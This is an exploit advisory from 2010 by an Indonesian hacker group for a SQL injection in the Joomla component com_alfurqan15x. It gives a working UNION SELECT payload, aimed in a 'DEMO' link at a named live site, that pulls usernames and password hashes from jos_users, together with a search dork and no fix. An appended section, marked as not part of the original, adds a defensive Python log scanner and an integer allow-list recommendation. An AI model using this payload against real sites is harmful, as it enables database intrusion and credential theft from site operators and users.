#############################################################################################################
## Joomla Component com_alfurqan15x SQL injection
## Author   : kaMtiEz (kamtiez@indonesiancoder.com)
## Homepage : http://www.indonesiancoder.com
## Date     : 16 Nov, 2010
#############################################################################################################

[ Software Information ]

[+] Vendor        : http://islamis4u.co.cc/
[+] Download      : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5
[+] version       : 2.2 or lower maybe also affected
[+] Tested On     : LocalHost
[+] Vulnerability : SQL
[+] Dork          : "CiHuY"
[+] LOCATION      : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs]

[ DEMO ]

http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n,Hmei7
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,k4mpret0
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock,RyanAby

[ NOTE ]

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Happy Eid al-Adha ;)
[+] pondok buncit @ dejavuNet , drinking beer is numero uno
[+] alone at night, smoking while waiting for the beauty of the morning ;)
[+] condolences for the disaster in my country .. :((

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..
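
[ DETECTION (added example) ]

The advisory gives no fix, so this added example (not part of the original advisory or the component's code) shows how a defender can find requests in a web access log that put a non-integer value in the surano parameter of com_alfurqan15x. The log lines are constructed, and treating a legitimate surano as a short plain integer is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request portion of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMPONENT = "com_alfurqan15x"      # component named in the advisory
PARAM = "surano"                   # parameter named in the advisory
VALID = re.compile(r"[0-9]{1,3}")  # assumption: a sura number is a short integer

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Nov/2010:10:00:01 +0700] "GET /index.php?option=com_alfurqan15x&action=viewayat&surano=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Nov/2010:10:00:05 +0700] "GET /index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,2,3,4,5-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [16/Nov/2010:10:00:09 +0700] "GET /index.php?option=com_alfurqan15x&action=viewayat&surano=1&surano=1%2527 HTTP/1.1" 200 640',
    '192.0.2.10 - - [16/Nov/2010:10:00:12 +0700] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000',
]


def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of URL encoding (double-encoded input)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_surano(log_line):
    """Return the decoded offending value, or None if the line is clean or unrelated."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if COMPONENT not in params.get("option", []):
        return None
    # Check every occurrence: a duplicated parameter can hide the bad value.
    for raw in params.get(PARAM, []):
        value = decode_fully(raw)
        if not VALID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line number, decoded value) for every flagged request."""
    hits = [(n, suspicious_surano(line)) for n, line in enumerate(lines, 1)]
    return [(n, v) for n, v in hits if v is not None]
```

The same allow-list check (integer only) is what the component should apply to surano before the value reaches a query.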